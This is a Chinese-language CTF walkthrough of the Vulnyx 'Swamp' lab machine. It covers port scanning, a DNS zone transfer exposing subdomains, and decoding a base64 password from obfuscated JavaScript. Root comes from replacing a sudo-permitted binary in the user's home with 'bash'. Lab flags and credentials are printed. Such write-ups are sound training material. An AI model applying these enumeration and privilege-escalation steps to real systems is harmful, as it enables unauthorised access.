Vulnyx-Swamp靶机详解WP

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.141  08:00:27:38:c3:84       (Unknown)
192.168.60.254  00:50:56:e0:55:bd       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
iEnding arp-scan 1.10.0: 256 hosts scanned in 1.931 seconds (132.57 hosts/sec). 4 responded
❯ export ip=192.168.60.141
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.141:22
Open 192.168.60.141:53
Open 192.168.60.141:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-07 15:42 CST
Initiating ARP Ping Scan at 15:42
Scanning 192.168.60.141 [1 port]
Completed ARP Ping Scan at 15:42, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:42
Completed Parallel DNS resolution of 1 host. at 15:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:42
Scanning 192.168.60.141 [3 ports]
Discovered open port 80/tcp on 192.168.60.141
Discovered open port 53/tcp on 192.168.60.141
Discovered open port 22/tcp on 192.168.60.141
Completed SYN Stealth Scan at 15:42, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.60.141
Host is up, received arp-response (0.00056s latency).
Scanned at 2025-01-07 15:42:41 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
53/tcp open  domain  syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:38:C3:84 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

发现curl 80端口不显示任何响应

浏览器访问一下，发现是绑定了域名，编辑一下hosts

❯ sudo vim /etc/hosts
192.168.60.141 swamp.nyx
❯ curl swamp.nyx
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to Swamp</title>
    <style>
        html, body {
            height: 100%;
            margin: 0;
        }
        body {
            background-image: url('swamp.jpg');
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
        }
    </style>
</head>
<body>


</body>
</html>

我们怀疑可能还有子目录

子域名收集

靶机很可能上运行了DNS服务，那就利用dig来查询靶机上还有其他记录

❯ dig axfr swamp.nyx @192.168.60.141
                                                                                                                                                      ; <<>> DiG 9.20.2-1-Debian <<>> axfr swamp.nyx @192.168.60.141
;; global options: +cmd
swamp.nyx.              604800  IN      SOA     ns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800
swamp.nyx.              604800  IN      NS      ns1.swamp.nyx.
d0nkey.swamp.nyx.       604800  IN      A       0.0.0.0
dr4gon.swamp.nyx.       604800  IN      A       0.0.0.0
duloc.swamp.nyx.        604800  IN      A       0.0.0.0
f1ona.swamp.nyx.        604800  IN      A       0.0.0.0
farfaraway.swamp.nyx.   604800  IN      A       0.0.0.0
ns1.swamp.nyx.          604800  IN      A       0.0.0.0
shr3k.swamp.nyx.        604800  IN      A       0.0.0.0
swamp.nyx.              604800  IN      SOA     ns1.swamp.nyx. . 2025010401 604800 86400 2419200 604800
;; Query time: 19 msec
;; SERVER: 192.168.60.141#53(192.168.60.141) (TCP)
;; WHEN: Tue Jan 07 22:07:53 CST 2025
;; XFR size: 10 records (messages 1, bytes 309)

文本处理一下，再次将域名添加到hosts中

❯ dig axfr swamp.nyx @192.168.60.141|grep -P '\bA\b'|awk '{print $1}'|sed 's/\.$//g' |xargs
d0nkey.swamp.nyx dr4gon.swamp.nyx duloc.swamp.nyx f1ona.swamp.nyx farfaraway.swamp.nyx ns1.swamp.nyx shr3k.swamp.nyx
❯ sudo vim /etc/hosts

依次访问这些域名

发现都是一些图片之类的

一顿搜寻后在farfaraway.swamp.nyx这个域名下发现有个js脚本

❯ curl http://farfaraway.swamp.nyx/
<!DOCTYPE html>
<html lang="es">
<script src="script.min.js"></script>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to Far Far Away</title>
    <style>
        html, body {
            height: 100%;
            margin: 0;
        }
        body {
            background-image: url('farfaraway.jpg');
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
        }
    </style>
</head>
<body>

</body>
</html>
❯ curl http://farfaraway.swamp.nyx/script.min.js
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('!M(){1C e;9 1D((e,t)=>{11(()=>{e("1y z 1z: 5")},1L)}).1I(e=>{6.7(e)}).1j(e=>{6.F(e)});8 t=1G e=>{1M{8 t=1g(1g 1l(e)).1p();6.7("1q 1l 2c:",t)}1j(o){6.F("1k 27 1d:",o)}};t("2d://2k.2h.2f/2g"),(()=>{8 e=k.26("1S");e.1T="1P 1V 22 R J 23",k.2b.1X(e)})();1W o{1Y(e,t){B.j=e,B.Q=t}C(){6.7(`${B.j}1Z:${B.Q}`)}}8 a=9 o("1O","1Q"),l=9 o("1R","24");a.C(),l.C();8 r=[1,2,3,4,5],n=r.2i(e=>2*e);6.7("2j 17:",n);8 s=r.2e((e,t)=>e+t,0);6.7("28 1i 17:",s);6.7("29 q:",{j:"T",b:30,2a:"1N"}),2l(()=>{6.7("12 1H 1r 1s 2 Z")},1t),k.1u("1v",()=>{6.7("1m 1o 1n J k")});8 g=9 14;6.7("1w W:",g.Y());8 i=9 14(g.1J()+1,g.1K(),g.1F());6.7("1E W:",i.Y());8 c=e=>{e%2==0?6.7(e+" z 1x"):6.7(e+" z 1A")};[10,21,32,1B,1U].V(c),11(()=>{6.7("12 2V 2W 3 Z")},2X);(e=>{8 t=e(10,20);6.7("2N 1c 2P-2R M:",t)})((e,t)=>e+t);8{X:d,13:u,b:h}={X:"31",13:"33",b:25};6.7(`2m:${d}${u},36:${h}`);8 m=9 19;m.N("j","G"),m.N("b",30),m.N("K","1b 1b 37"),6.7("19 15:"),m.V((e,t)=>{6.7(t+": "+e)});8 p=9 18([1,2,3,4,4,5]);6.7("18 15 (2u 2v):",2x.1c(p));8 $=M*e(){E"2s D",E"2p D",E"2q D"}();6.7($.H().A),6.7($.H().A),6.7($.H().A);6.7("2r, T! 2H R J 2I.");2K:2G;8 f=x.1h(\'{"j":"G","b":30}\');6.7("2F x 1d:",f),"O"1e U?U.O.2B(e=>{6.7("2A 2C K:",e.P.2D,e.P.2E)},e=>{6.F("1k 2L K:",e)}):6.7("2J 2z 2y");8 v="    2n z 2o!   ",y=v.2t();6.7("2w 1f:",y);8 S=v.2M();6.7("2Z 1f:",S),I.35("q",x.34({j:"G",b:30}));8 w=x.1h(I.38("q"));6.7("39 q 1e I:",w),6.7("2Q 2O:",L.2S()),6.7("2T 2Y 1i 16:",L.2U(16)),6.7("1a A:",L.1a)}();',62,196,'||||||console|log|let|new||age||||||||name|document||||||user|||||||JSON||is|value|this|speak|part|yield|error|Shrek|next|localStorage|the|location|Math|function|set|geolocation|coords|sound|to||John|navigator|forEach|date|firstName|toString|seconds||setTimeout|This|lastName|Date|values||numbers|Set|Map|PI|Far|from|data|in|string|await|parse|of|catch|Error|fetch|Click|on|detected|json|Data|repeats|every|2e3|addEventListener|click|Current|even|Value|positive|odd|43|var|Promise|Future|getDate|async|message|then|getFullYear|getMonth|1e3|try|USA|Dog|Dynamically|Woof|Cat|div|innerHTML|54|added|class|appendChild|constructor|says|||text|DOM|Meow||createElement|fetching|Sum|Updated|country|body|success|https|reduce|com|posts|typicode|map|Doubled|jsonplaceholder|setInterval|Destructuring|JavaScript|fun|Second|Third|Hello|First|trim|no|duplicates|Trimmed|Array|available|not|Your|getCurrentPosition|current|latitude|longitude|Parsed|c2hyZWs6cHV0b3Blc2FvZWxhc25v|Welcome|page|Geolocation|Password|getting|toUpperCase|Result|number|higher|Random|order|random|Square|sqrt|runs|after|3e3|root|Uppercase||Jane||Doe|stringify|setItem|Age|Away|getItem|Stored'.split('|'),0,{}))

你可以将js粘贴到控制台运行一下

发现有个函数未定义，意思base64编码，尝试解码一下

用户提权

得到账户密码shrek:putopesaoelasno，ssh登录一下

有个sudo权限，可以运行 header_checker，我们可以读取写入执行

❯ ssh [email protected]
The authenticity of host '192.168.60.141 (192.168.60.141)' can't be established.
ED25519 key fingerprint is SHA256:q2oJVk8pvyNE1iEAucoSG9iwm1MeIlnMRT7L9fXkqzI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.141' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux swamp 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jan  4 13:12:39 2025 from 192.168.1.33
shrek@swamp:~$ ls
header_checker  user.txt
shrek@swamp:~$ cat user.txt
7d199d72f12135ef193ad19faf9468ef
shrek@swamp:~$ sudo -l
Matching Defaults entries for shrek on swamp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User shrek may run the following commands on swamp:
    (ALL) NOPASSWD: /home/shrek/header_checker

随便运行一下，可能是个类似curl的

shrek@swamp:~$ ./header_checker
Error: --url is required.
Usage: ./header_checker --url '<url>' [--timeout <timeout>] [--method <method>] [--headers <custom_headers>]

Flags:
  --url '<url>'             The URL to fetch headers from (required)
  --timeout <timeout>     The maximum time (in seconds) to wait for a response (optional, default: 10)
  --method <method>       The HTTP method to use (optional, default: GET)
  --headers <headers>     Custom headers to send with the request (optional)
  --help                  Display this help message
Example: ./header_checker --url "google.com"
shrek@swamp:~$ ./header_checker --url 127.0.0.1
Fetching response headers from: 127.0.0.1
Timeout: 10 seconds
HTTP Method: GET
Custom Headers:
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
Response Headers:
HTTP/1.1 302 Found
Date: Tue, 07 Jan 2025 22:29:41 GMT
Server: Apache/2.4.62 (Debian)
Location: http://swamp.nyx
Content-Length: 0
Content-Type: text/html; charset=UTF-8

先把文件down到本地分析一下

❯ scp [email protected]:header_checker .
[email protected]'s password:
header_checker      
❯ file header_checker
header_checker: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=92705383d5f382278a2724d604e2523e7f73e4cb, for GNU/Linux 3.2.0, stripped

可与利用strings分析一下

❯ strings header_checker
/lib64/ld-linux-x86-64.so.2
exit
stat
strdup
time
strlen
getpid
execvp
malloc
__libc_start_main
stderr
fprintf
__cxa_finalize
sprintf
putenv
strerror
getenv
calloc
memcmp
memset
__isoc99_sscanf
atoll
memcpy
fwrite
__errno_location
__environ
libc.so.6
GLIBC_2.7
GLIBC_2.14
GLIBC_2.33
GLIBC_2.34
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
ATSH
[A\]
x%lx
=%lu %d
%lu %d%c
E: neither argv[0] nor $_ works.
<null>
%s%s%s: %s
;*3$"
fi=+@
\_cV
#I`k
d:uTq<
IjCyx/sT
*rF0
5q4$i&
tuFe
'FDT
`MMl@
aoP8
k1pY
uQ8TT*x
(t7{
o;(/G
        |voE
b8)j
_yrd
4rhD
UHL_
h.+w
;]PcSZ
_473
 *SFu
)[P.
Qf2M
Ou}(
fnK$r
M=Pc
~HMm3
nIhV
ih3#
bX+]
F.2h
we-w
nXp2
h       3_
GCC: (Debian 12.2.0-14) 12.2.0
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

好像并没有发现又curl的相关调用啊

Root提权

但是我们发现这个文件是可以直接删除的

直接删除重新写一个就行了，直接拿到root shell

shrek@swamp:~$ rm header_checker
shrek@swamp:~$ echo 'bash'>header_checker
shrek@swamp:~$ chmod +x header_checker
shrek@swamp:~$ sudo -l
Matching Defaults entries for shrek on swamp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User shrek may run the following commands on swamp:
    (ALL) NOPASSWD: /home/shrek/header_checker
shrek@swamp:~$ sudo /home/shrek/header_checker
root@swamp:/home/shrek# id
uid=0(root) gid=0(root) groups=0(root)
root@swamp:/home/shrek# cat /root/root.txt
9c7bddee2e2fb8ad03854f106f23c6b5
root@swamp:/home/shrek#